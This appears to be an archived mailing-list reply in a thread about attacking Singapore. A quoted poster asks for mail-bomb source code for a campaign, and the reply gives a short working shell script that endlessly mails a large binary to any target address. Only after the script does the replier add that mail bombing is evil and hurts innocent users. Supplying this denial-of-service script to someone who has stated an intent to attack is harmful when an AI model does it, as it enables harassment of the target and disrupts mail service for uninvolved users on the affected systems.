[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Nuke Singapore Back into the Stone Age
>>>>> "Charley" == Charley Sparks <[email protected]> writes:
Charley> We could launch a mail-bomb campaign.. I am looking for the
Charley> source for a mail bomb program. WinTel would be nice but I
Charley> could use Linux
This isn't rocket science.
#! /bin/sh
# call as: mailbomb [email protected]
while true; do
mail $1 < /usr/local/bin/xemacs
done
Mail bombing is an evil thing -- the most likely victims of a mail
bombing are innocent of wrong doing (such as the other users on the
system where a script similar to the above is run on).
--
[email protected] baur
Unsolicited commercial e-mail will be billed at $250/message.
What are the last two letters of "doesn't" and "can't"?
Coincidence? I think not.